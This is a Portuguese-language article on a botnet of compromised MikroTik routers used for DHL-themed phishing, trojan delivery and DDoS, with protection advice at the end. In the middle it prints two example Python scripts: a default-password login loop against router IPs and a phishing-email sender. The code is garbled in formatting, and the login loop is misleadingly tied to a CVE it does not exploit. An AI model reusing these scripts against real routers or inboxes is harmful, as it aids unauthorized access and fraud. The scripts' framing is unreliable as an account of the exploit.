MikroTik hackeados são usados para espalhar malware

Botnet: Roteadores da MikroTik hackeados usados para espalhar malware

A cibersegurança é um tema cada vez mais relevante, especialmente em um mundo onde dispositivos conectados são alvos constantes de ataques. Recentemente, cerca de 13 mil roteadores MikroTik foram comprometidos e utilizados em uma botnet para disseminar malware, realizar ataques DDoS e outras atividades maliciosas. Este artigo explora como isso aconteceu, as vulnerabilidades envolvidas, as consequências e como proteger seus dispositivos.

 

A campanha maliciosa sobre o MikroTik

Em novembro de 2024, a empresa de cibersegurança Infoblox revelou que criminosos exploraram registros de DNS mal configurados em dispositivos MikroTik. Usando esses roteadores, enviaram e-mails fraudulentos que imitavam a empresa de logística DHL, induzindo usuários a baixar um arquivo ZIP contendo um trojan perigoso.

 

Como funciona o ataque

  • Exploração inicial: Os criminosos identificam roteadores vulneráveis, utilizando a falha CVE-2023-30799 para obter acesso total ao dispositivo.

  • Envio de e-mails falsos: A botnet dispara dezenas de milhares de mensagens fraudulentas, que podem parecer legítimas, mas contêm malware escondido.

  • Infecção com trojan: Quando o destinatário baixa e executa o arquivo, o trojan é instalado silenciosamente, permitindo acesso remoto ao sistema comprometido.

  • Ações ilícitas: Os dispositivos são utilizados para ataques de phishing, roubo de dados e ataques de negação de serviço (DDoS).

 

A campanha maliciosa foi apelidada de

Infoblox/Reprodução A campanha maliciosa foi apelidada de “Mikro Typo”. (Imagem: Infoblox/Reprodução)

 

Exemplos de scripts maliciosos 

Aqui estão dois exemplos de como scripts podem ser usados em campanhas maliciosas:

1. Script para automatizar a exploração da vulnerabilidade

 

import requests

def explorar_roteador(ip, credenciais):
        url = f”http://{ip}/login”
        payload = {“username”: credenciais[0], “password”: credenciais[1]}

         resposta = requests.post(url, data=payload)
        if resposta.status_code == 200 and “sucesso” in resposta.text:
             print(f”Dispositivo {ip} comprometido!”)
             return True
         return False

# Lista de IPs alvo
ips_alvo = [“192.168.1.1”, “192.168.2.1”]
credenciais = (“admin”, “admin”)

for ip in ips_alvo:
       explorar_roteador(ip, credenciais)

 

2. Script para envio de e-mails fraudulentos

 

import smtplib
from email.mime.text import MIMEText

def enviar_email(destinatario, assunto, corpo):
         servidor = smtplib.SMTP(‘smtp.fraudulento.com’, 587)
         servidor.starttls()
        servidor.login(“[email protected]”, “senha”)

        mensagem = MIMEText(corpo)
        mensagem[‘From’] = “[email protected]
        mensagem[‘To’] = destinatario
        mensagem[‘Subject’] = assunto

        servidor.sendmail(“[email protected]”, destinatario, mensagem.as_string())
        servidor.quit()

# Envio de e-mails maliciosos
emails = [“[email protected]”, “[email protected]”]
for email in emails:
        enviar_email(email, “Entrega pendente”, “Baixe os documentos em anexo.”)

 

Como se proteger

Os pesquisadores recomendam as seguintes medidas para mitigar os riscos:

  • Atualização de firmware: Instale as atualizações mais recentes fornecidas pela MikroTik.

  • Mudança de credenciais: Substitua as credenciais padrão por senhas fortes e exclusivas.

  • Configuração adequada do DNS: Certifique-se de que os registros de DNS estejam configurados corretamente para evitar explorações.

  • Monitoramento contínuo: Use ferramentas de monitoramento para detectar atividades incomuns em sua rede.

 

Conclusão

O caso dos roteadores MikroTik hackeados é um alerta importante sobre a necessidade de medidas rigorosas de segurança. Os cibercriminosos continuam a explorar vulnerabilidades conhecidas, tornando essencial a manutenção regular e a proteção proativa dos dispositivos conectados. Esteja sempre atento às atualizações de segurança e tome precauções para proteger sua rede.

 

Fonte e imagens: https://www.tecmundo.com.br/seguranca/401727-botnet-roteadores-da-mikrotik-hackeados-sao-usados-para-espalhar-malware.htm